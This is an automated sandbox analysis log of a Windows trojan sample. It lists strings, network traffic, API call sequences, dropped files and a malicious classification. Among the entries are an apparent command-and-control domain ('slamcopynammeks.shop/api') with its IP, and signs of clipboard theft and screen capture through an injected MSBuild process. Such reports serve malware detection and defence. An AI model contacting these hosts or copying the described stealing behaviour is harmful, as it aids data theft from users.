                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://ocsp.digicert.com0A
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://ocsp.digicert.com0C
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://ocsp.digicert.com0H
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://ocsp.digicert.com0I
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://ocsp.sectigo.com0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: https://sectigo.com/CPS0
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slamcopynammeks.shop/
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slamcopynammeks.shop/C
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slamcopynammeks.shop/CT
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slamcopynammeks.shop/api
                    Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slamcopynammeks.shop:443/api
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://system.data.sqlite.org/
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeString found in binary or memory: https://www.digicert.com/CPS0
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.security.us.panasonic.com
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sqlite.org/lang_aggfunc.html
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sqlite.org/lang_corefunc.html
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.12.112:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042EF60 GetWindowLongW,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0042EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042EF60 GetWindowLongW,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0042EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00430616 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,2_2_00430616
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEBB6B00_2_6CEBB6B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CF0AC290_2_6CF0AC29
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEB2D700_2_6CEB2D70
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEE4EE00_2_6CEE4EE0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CED49700_2_6CED4970
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CED4AC00_2_6CED4AC0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CF00B890_2_6CF00B89
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CE98B300_2_6CE98B30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CF0A54D0_2_6CF0A54D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CED45500_2_6CED4550
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CE966500_2_6CE96650
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CE9A7E00_2_6CE9A7E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CE9C7B00_2_6CE9C7B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEAA0C00_2_6CEAA0C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEE63B00_2_6CEE63B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEF23100_2_6CEF2310
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEF1CA00_2_6CEF1CA0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CED3C900_2_6CED3C90
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CF05DD20_2_6CF05DD2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEE5DD00_2_6CEE5DD0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEE5EB90_2_6CEE5EB9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CED3E500_2_6CED3E50
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CF0BFF10_2_6CF0BFF1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CF09FFC0_2_6CF09FFC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEE58D70_2_6CEE58D7
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEE58D50_2_6CEE58D5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEE58300_2_6CEE5830
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CF0B9640_2_6CF0B964
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CF09AAB0_2_6CF09AAB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CED34600_2_6CED3460
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEE50500_2_6CEE5050
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CED32600_2_6CED3260
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_6CEE52740_2_6CEE5274
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_02A880380_2_02A88038
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_02A88CD80_2_02A88CD8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_02A813080_2_02A81308
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_02A813180_2_02A81318
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_02A817280_2_02A81728
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_02A817380_2_02A81738
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_06EE26F80_2_06EE26F8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_06EE0EB30_2_06EE0EB3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_06EE26DB0_2_06EE26DB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: 0_2_06EE09300_2_06EE0930
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042000C2_2_0042000C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043C1B02_2_0043C1B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004263C62_2_004263C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004047F02_2_004047F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004208D02_2_004208D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00434FF02_2_00434FF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004060702_2_00406070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004010002_2_00401000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042826A2_2_0042826A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004032D02_2_004032D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043C4702_2_0043C470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004374A02_2_004374A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004224AC2_2_004224AC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004066302_2_00406630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004277662_2_00427766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004297732_2_00429773
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043C7702_2_0043C770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004017E02_2_004017E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004249F02_2_004249F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041BA8A2_2_0041BA8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042EB282_2_0042EB28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00421BD32_2_00421BD3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00407D202_2_00407D20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0040EF602_2_0040EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00420FE02_2_00420FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00408720 appears 49 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00408F10 appears 180 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: String function: 6CEF9B35 appears 141 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: String function: 6CEF90D8 appears 51 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeCode function: String function: 6CEFD520 appears 31 times
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic PE information: invalid certificate
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.00000000059C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2013283838.0000000006D40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2013353714.0000000006E40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2011062969.0000000006968000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.0000000005839000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002C0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemainweeksource_band7.exeL* vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Data.SQLite.Linq.dllF vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePcapDotNet.Packets.dll0 vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeBinary or memory string: OriginalFilenamemainweeksource_band7.exeL* vs SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpUnknownLayer.csSuspicious method names: .IcmpUnknownLayer.WritePayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpLayer.csSuspicious method names: .IcmpLayer.EqualPayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpLayer.csSuspicious method names: .IcmpLayer.WritePayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpRouterAdvertisementDatagram.csSuspicious method names: .IcmpRouterAdvertisementDatagram.GetPayloadLength
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, PayloadLayer.csSuspicious method names: .PayloadLayer.Equals
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, PayloadLayer.csSuspicious method names: .PayloadLayer.Write
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpAddressMaskRequestLayer.csSuspicious method names: .IcmpAddressMaskRequestLayer.EqualPayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpAddressMaskRequestLayer.csSuspicious method names: .IcmpAddressMaskRequestLayer.WritePayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryIp.csSuspicious method names: .GreSourceRouteEntryIp.EqualsPayloads
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryIp.csSuspicious method names: .GreSourceRouteEntryIp.WritePayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntry.csSuspicious method names: .GreSourceRouteEntry.EqualsPayloads
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntry.csSuspicious method names: .GreSourceRouteEntry.WritePayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpTimestampLayer.csSuspicious method names: .IcmpTimestampLayer.EqualPayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpTimestampLayer.csSuspicious method names: .IcmpTimestampLayer.WritePayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryUnknown.csSuspicious method names: .GreSourceRouteEntryUnknown.WritePayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryUnknown.csSuspicious method names: .GreSourceRouteEntryUnknown.EqualsPayloads
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, EthernetPayloadDatagrams.csSuspicious method names: .EthernetPayloadDatagrams.Get
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpTraceRouteLayer.csSuspicious method names: .IcmpTraceRouteLayer.WritePayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpTraceRouteLayer.csSuspicious method names: .IcmpTraceRouteLayer.EqualPayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryAs.csSuspicious method names: .GreSourceRouteEntryAs.EqualsPayloads
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, GreSourceRouteEntryAs.csSuspicious method names: .GreSourceRouteEntryAs.WritePayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpIpV4HeaderPlus64BitsPayloadDatagram.csSuspicious method names: .IcmpIpV4HeaderPlus64BitsPayloadDatagram.CalculateIsValid
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpIpV4PayloadDatagram.csSuspicious method names: .IcmpIpV4PayloadDatagram.CalculateIsValid
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpRouterAdvertisementLayer.csSuspicious method names: .IcmpRouterAdvertisementLayer.EqualPayload
                    Source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.5481164.8.raw.unpack, IcmpRouterAdvertisementLayer.csSuspicious method names: .IcmpRouterAdvertisementLayer.WritePayload
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@1/1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042D4DE CoCreateInstance,2_2_0042D4DE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to behavior
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.91%
